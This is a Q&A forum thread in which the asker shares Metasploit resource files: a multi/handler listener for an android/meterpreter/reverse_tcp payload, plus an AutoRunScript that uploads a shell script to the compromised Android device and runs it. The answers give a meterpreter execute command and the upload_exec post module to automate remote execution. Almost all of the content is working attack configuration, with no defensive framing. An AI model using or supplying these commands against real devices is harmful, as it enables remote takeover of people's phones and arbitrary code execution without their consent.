# Programming Metasploit

Tags: metasploit, programming

I try to make a Metasploit AutoRunScript for android. The First .rc file has this config

```
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx (my IP)
set LPORT 4545
set AutoRunScript multi_console_command -r /root/Desktop/commands.rc
exploit -j -z
```

This is the second .rc file (commands.rc)

```
upload /root/Desktop/and.sh /data/data/com.metasploit.stage/files
shell
cd /data/data/com.metasploit.stage/files 
sh and.sh
exit
```

The problem is after the `shell` command is `executed the sh and.sh` and the `exit` commands are not executed. If I type manually the `sh and.sh` and the `exit` commands it's working. The question is how can I make this commands to be executed? Any suggestions are welcome and appreciated!

Answer (score 1):

It's possible the shell is getting stuck once it gets dropped down.

Try running your command via the built in meterpreter shell command.

```
execute -i -f "/bin/bash /data/data/com.metasploit.stage/files/and.sh"
```

I have not tested this exact command with a space in it, but it will start you in the right direction.

Answer (score 1):

Apart from the standarduser's answer, you can use `post/multi/manage/upload_exec` to automatically upload and execute the binary on remote machines. This module can work both with meterpreter as well as shell payloads.